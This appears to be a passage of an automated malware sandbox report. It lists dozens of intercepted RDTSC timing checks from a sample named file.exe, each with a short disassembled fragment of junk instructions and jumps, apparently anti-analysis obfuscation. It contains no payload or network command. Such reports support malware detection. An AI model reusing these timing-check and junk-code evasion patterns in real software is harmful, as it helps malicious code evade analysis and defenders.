              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF36B6 second address: CF36BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF36BA second address: CF36C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7F50 second address: CE7F56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8017 second address: CE801C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE801C second address: CE8022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF5711 second address: CF5715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF57D2 second address: CF57D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC6D3 second address: CEC6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6682 second address: CF6686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6686 second address: CF6694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FA1D8D18336h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8716 second address: CF8743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pushad 0x0000000c jng 00007FA1D8D64E56h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FA1D8D64E68h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8743 second address: CF874D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF874D second address: CF8791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FA1D8D64E58h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FA1D8D64E75h 0x00000019 jo 00007FA1D8D64E6Fh 0x0000001f jmp 00007FA1D8D64E63h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE6EF second address: CEE6F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFB290 second address: CFB2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA1D8D64E56h 0x0000000c popad 0x0000000d pushad 0x0000000e js 00007FA1D8D64E56h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FA1D8D64E67h 0x0000001b popad 0x0000001c jmp 00007FA1D8D64E5Fh 0x00000021 pushad 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA526B second address: CA5275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE6F3 second address: CEE70E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE7B3 second address: CEE7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0288D second address: D02893 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02893 second address: D028EC instructions: 0x00000000 rdtsc 0x00000002 js 00007FA1D8D1834Fh 0x00000008 jmp 00007FA1D8D18349h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jnp 00007FA1D8D18336h 0x00000016 jc 00007FA1D8D18336h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f jbe 00007FA1D8D1835Bh 0x00000025 pushad 0x00000026 jp 00007FA1D8D18336h 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f pushad 0x00000030 jmp 00007FA1D8D18341h 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02200 second address: D02206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02206 second address: D02221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1D8D1833Ch 0x0000000c jc 00007FA1D8D18336h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF08C5 second address: CF0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007FA1D8D64E60h 0x00000010 nop 0x00000011 jmp 00007FA1D8D64E5Fh 0x00000016 mov dword ptr [ebp+122D299Dh], ecx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov di, 2ABFh 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007FA1D8D64E58h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D03D9h] 0x0000004e sub ebx, dword ptr [ebp+122D3545h] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push edx 0x00000059 call 00007FA1D8D64E58h 0x0000005e pop edx 0x0000005f mov dword ptr [esp+04h], edx 0x00000063 add dword ptr [esp+04h], 00000019h 0x0000006b inc edx 0x0000006c push edx 0x0000006d ret 0x0000006e pop edx 0x0000006f ret 0x00000070 mov edi, 2E042434h 0x00000075 sub dword ptr [ebp+122D1927h], esi 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jno 00007FA1D8D64E58h 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4867 second address: CF486C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF6996 second address: CF699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8F12 second address: CF8F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8F18 second address: CF8F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D067C1 second address: D067DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18341h 0x00000009 jo 00007FA1D8D18336h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D067DC second address: D067E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D067E0 second address: D067F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA1D8D18336h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07F02 second address: D07F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA1D8D64E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08056 second address: D0805B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0805B second address: D080A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D64E56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jg 00007FA1D8D64E5Ch 0x00000015 jmp 00007FA1D8D64E5Eh 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007FA1D8D64E5Dh 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jnc 00007FA1D8D64E56h 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D080A7 second address: D080AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D080AB second address: D080BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D080BC second address: D080C6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1D8D18336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F133 second address: D0F141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DE30 second address: D0DE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DE34 second address: D0DE40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E4E8 second address: D0E4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D18341h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E4FF second address: D0E503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E7C4 second address: D0E7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18345h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E9A0 second address: D0E9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E9A4 second address: D0E9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EC80 second address: D0ECA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D64E69h 0x00000009 jl 00007FA1D8D64E56h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ECA8 second address: D0ECAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EE36 second address: D0EE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA1D8D64E56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EE45 second address: D0EE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EE49 second address: D0EE5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EFB1 second address: D0EFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13772 second address: D13778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13778 second address: D1377D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1377D second address: D137B2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA1D8D64E6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1D8D64E5Dh 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE503F second address: CE5048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5048 second address: CE504C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE57D9 second address: CE57DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE57DE second address: CE5809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jno 00007FA1D8D64E5Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push ebx 0x00000014 jng 00007FA1D8D64E56h 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007FA1D8D64E56h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5809 second address: CE580D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE59F0 second address: CE5A11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FA1D8D64E56h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5A11 second address: CE5A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5DD8 second address: CE5E60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1D8D64E58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA1D8D64E58h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov edx, 3B7F6141h 0x0000002e push 0000001Eh 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FA1D8D64E58h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D278Ch], esi 0x00000050 ja 00007FA1D8D64E58h 0x00000056 nop 0x00000057 jl 00007FA1D8D64E6Bh 0x0000005d jmp 00007FA1D8D64E65h 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE61E8 second address: CE61F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE61F5 second address: CC358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA1D8D64E62h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FA1D8D64E58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov edx, dword ptr [ebp+122D3529h] 0x0000002c lea eax, dword ptr [ebp+12488E38h] 0x00000032 mov dword ptr [ebp+122D2768h], esi 0x00000038 push eax 0x00000039 jmp 00007FA1D8D64E5Ch 0x0000003e mov dword ptr [esp], eax 0x00000041 or cx, 424Ah 0x00000046 lea eax, dword ptr [ebp+12488DF4h] 0x0000004c mov ecx, edi 0x0000004e nop 0x0000004f pushad 0x00000050 jmp 00007FA1D8D64E5Bh 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 jmp 00007FA1D8D64E61h 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 jmp 00007FA1D8D64E61h 0x00000065 nop 0x00000066 mov edx, 47E66B7Fh 0x0000006b call dword ptr [ebp+122D1B75h] 0x00000071 pushad 0x00000072 jmp 00007FA1D8D64E65h 0x00000077 jnl 00007FA1D8D64E6Dh 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC358B second address: CC35E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1D8D18341h 0x00000009 jmp 00007FA1D8D18349h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1D8D18346h 0x00000016 jne 00007FA1D8D18345h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC35E7 second address: CC35ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC35ED second address: CC35F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC35F1 second address: CC35F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12B78 second address: D12B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12B7C second address: D12B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12E6E second address: D12EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D1833Fh 0x00000008 jno 00007FA1D8D18336h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jnl 00007FA1D8D18336h 0x00000016 popad 0x00000017 jmp 00007FA1D8D18348h 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FA1D8D18344h 0x00000026 push esi 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12EC3 second address: D12ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12ECB second address: D12ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13177 second address: D13189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13189 second address: D1319C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA1D8D18336h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D132E8 second address: D132EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D132EE second address: D132F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19165 second address: D19169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19169 second address: D19187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jp 00007FA1D8D18336h 0x00000011 jbe 00007FA1D8D18336h 0x00000017 jnl 00007FA1D8D18336h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C92A0D second address: C92A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FA1D8D64E56h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17DE1 second address: D17DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17F60 second address: D17F74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1835D second address: D18388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FA1D8D1833Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FA1D8D18343h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18388 second address: D1838C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D18490 second address: D1849E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1D8D18336h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1849E second address: D184C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA1D8D64E5Dh 0x0000000b jmp 00007FA1D8D64E5Fh 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D184C1 second address: D184D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D1833Ah 0x00000009 jl 00007FA1D8D18336h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D184D5 second address: D184D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17B2C second address: D17B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
